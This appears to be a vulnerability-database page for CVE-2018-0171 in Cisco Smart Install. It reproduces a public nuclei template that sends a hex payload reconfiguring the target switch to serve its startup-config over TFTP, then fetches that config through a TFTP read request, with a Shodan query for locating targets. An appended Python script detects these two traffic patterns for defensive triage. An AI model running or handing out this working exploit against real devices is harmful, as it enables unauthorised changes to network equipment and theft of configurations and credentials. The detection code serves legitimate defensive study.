CVE-2018-0171: Cisco Smart Install - Configuration Download

Date: 2025-08-01 | Affected software: Cisco Smart Install | PoC: public

Vulnerability description

Checks if TFTP service becomes available after Smart Install exploitation. This template should be run after the configuration extraction payload to verify that the device is now serving configuration files via TFTP.

PoC code [public]

id: CVE-2018-0171

info:
  name: Cisco Smart Install - Configuration Download
  author: ritikchaddha
  severity: critical
  description: |
    Checks if TFTP service becomes available after Smart Install exploitation. This template should be run after the configuration extraction payload to verify that the device is now serving configuration files via TFTP.
  reference:
    - https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-20180328-smi2
    - https://nvd.nist.gov/vuln/detail/CVE-2018-0171
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2018-0171
    epss-score: 0.93123
    epss-percentile: 0.99783
    cwe-id: CWE-20
    cpe: cpe:2.3:o:cisco:ios:15.2\(5\)e:*:*:*:*:*:*:*
  metadata:
    verified: true
    max-request: 2
    shodan-query: 'port:4786 "Smart Install"'
  tags: cve,cve2018,cisco,smart-install,tftp,network,js,kev

flow: tcp(1) && javascript(1)

tcp:
  - inputs:
      - data: 00000001000000010000000A00000050FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF555CCA6800000000000000000000000000000000FFFFFFFF00000001
        type: hex
      - data: 000000010000000100000008000001680001001400000001000000000021D863A560000000020154636F6E66696775726520746674702D736572766572206E7672616D3A737461727475702D636F6E666967000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000
        type: hex

    host:
      - "{{Hostname}}"
    port: 4786

    matchers:
      - type: word
        part: raw
        words:
          - ""
        internal: true

javascript:
  - pre-condition: |
      isUDPPortOpen(Host,Port);
    code: |
      let packet = bytes.NewBuffer();
      let message = "\x00\x01startup-config\x00octet\x00";
      packet.WriteString(message);

      let c = require("nuclei/net");
      let conn = c.Open('udp', `${Host}:${Port}`);
      conn.SendHex(packet.Hex());
      let resp = conn.RecvString(4096);
      resp;

    args:
      Host: "{{Host}}"
      Port: 69

    matchers:
      - type: word
        words:
          - 'boot-start-marker'
          - 'version'
          - 'hostname'
        condition: and
# digest: 4a0a0047304502203b9f36f67fe77d979e5f83262016b887717ba3404e6c3e67136fecd452315e54022100a84b6e2adf17fb6f1a7097b9f80a5e185e6d35b946af1f2949beb3fca9005464:922c64590222798bb761d5b6d8e72950
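
The two network signals this template relies on can be checked defensively in captured traffic: a Smart Install (TCP/4786) payload carrying a `tftp-server` command string, and a TFTP read request (UDP/69) for `startup-config`. The following is an added example, not part of the original template or of the nuclei project; the filename watch list, the rule names and the sample payloads are constructed assumptions.

```python
SENSITIVE_FILES = {"startup-config", "running-config"}  # assumed watch list

def parse_tftp_rrq(payload: bytes):
    """Return (filename, mode) for a well-formed TFTP read request (RFC 1350), else None."""
    if payload[:2] != b"\x00\x01":          # opcode 1 = RRQ
        return None
    fields = payload[2:].split(b"\x00")
    # "filename\0mode\0" yields at least three fields, the last one empty.
    if len(fields) < 3 or not fields[0] or not fields[1]:
        return None
    try:
        return fields[0].decode("ascii"), fields[1].decode("ascii").lower()
    except UnicodeDecodeError:
        return None

def is_config_read(payload: bytes) -> bool:
    """True when a UDP/69 payload is an RRQ for a device configuration file."""
    rrq = parse_tftp_rrq(payload)
    if rrq is None:
        return False
    # Drop any directory or IOS filesystem prefix such as "nvram:".
    name = rrq[0].lower().rsplit("/", 1)[-1].rsplit(":", 1)[-1]
    return name in SENSITIVE_FILES

def smi_enables_tftp(payload: bytes) -> bool:
    """True when a TCP/4786 payload embeds an IOS 'tftp-server' command string."""
    return b"tftp-server" in payload.lower()

# Constructed sample payloads (not captured traffic): (flow, bytes)
SAMPLES = [
    ("udp/69", b"\x00\x01startup-config\x00octet\x00"),
    ("udp/69", b"\x00\x01firmware.bin\x00octet\x00"),
    ("udp/69", b"\x00\x03\x00\x01data"),
    ("tcp/4786", b"\x00" * 8 + b"configure tftp-server nvram:startup-config" + b"\x00" * 8),
]

def triage(samples):
    """Return (index, rule) for every sample that matches a rule."""
    alerts = []
    for i, (flow, payload) in enumerate(samples):
        if flow == "udp/69" and is_config_read(payload):
            alerts.append((i, "tftp-config-read"))
        elif flow == "tcp/4786" and smi_enables_tftp(payload):
            alerts.append((i, "smi-tftp-server-command"))
    return alerts

if __name__ == "__main__":
    print(triage(SAMPLES))
```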
